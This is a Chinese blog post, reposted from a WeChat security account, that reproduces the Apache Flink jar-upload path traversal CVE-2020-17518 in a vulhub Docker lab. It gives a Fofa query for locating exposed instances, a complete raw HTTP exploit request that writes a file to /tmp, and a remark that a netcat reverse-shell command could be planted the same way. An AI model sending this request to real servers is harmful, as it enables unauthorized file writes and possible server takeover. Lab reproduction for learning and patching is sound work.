实操Apache Flink上传路径遍历(CVE-2020-17518)

admin 2022年5月30日01:33:56评论90 views字数 1231阅读4分6秒阅读模式

前言:

Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。

Apache Flink 1.5.1引入了一个REST处理程序,允许您通过恶意修改的HTTP头将上传的文件写入到本地文件系统上的任意

 

影响版本:

Flink 1.5.1-1.11.2

 

Fofa语句:

js_name="es2015-polyfills.923637a8e6d276e6f6df.js"

 

正文:

环境搭建:

使用vulhub搭建,搭建目录:

/vulhub-master/flink/CVE-2020-17518


启动命令:

docker-compose up -d


实操Apache Flink上传路径遍历(CVE-2020-17518)

访问:http://192.168.0.110:8081/#/overview

换成自己的靶机IP即可,访问效果如下:

实操Apache Flink上传路径遍历(CVE-2020-17518)

复现:

 很简单的一次复现,我们打开burp


实操Apache Flink上传路径遍历(CVE-2020-17518)

点击到重发器这里,使用重发器,发送下面的包

POST /jars/upload HTTP/1.1Host: 47.94.172.114:8081Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6YContent-Length: 181 ------WebKitFormBoundaryoZ8meKnrrso89R6YContent-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success" bai------WebKitFormBoundaryoZ8meKnrrso89R6Y--

//目的是写入一个success文件,自己也可以写入一个nc反弹shell的命令

然后我们点击发送

实操Apache Flink上传路径遍历(CVE-2020-17518)

这里返回虽然是400,但是我们已经成功传进去了

我们到靶机服务器中查看

先使用命令:

docker-compose ps

查看文件名

实操Apache Flink上传路径遍历(CVE-2020-17518)

复制文件名

cve-2020-17518-flink-1

然后命令:

docker exec -it cve-2020-17518-flink-1 bash


可以进入靶机的虚拟系统中,中间就是名字

实操Apache Flink上传路径遍历(CVE-2020-17518)

这里我们就进入了靶机的虚拟系统中,可以执行一些命令了

我们到tmp下查看一下

 ls /tmp

实操Apache Flink上传路径遍历(CVE-2020-17518)

这里可以看到成功上传的文件,代表你已经成功了。

 



群:70844080公众号:白安全组靶场资源网站:www.wangehacker.cn



原文始发于微信公众号(白安全组):实操Apache Flink上传路径遍历(CVE-2020-17518)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月30日01:33:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实操Apache Flink上传路径遍历(CVE-2020-17518)https://cn-sec.com/archives/1064323.html

发表评论

匿名网友 填写信息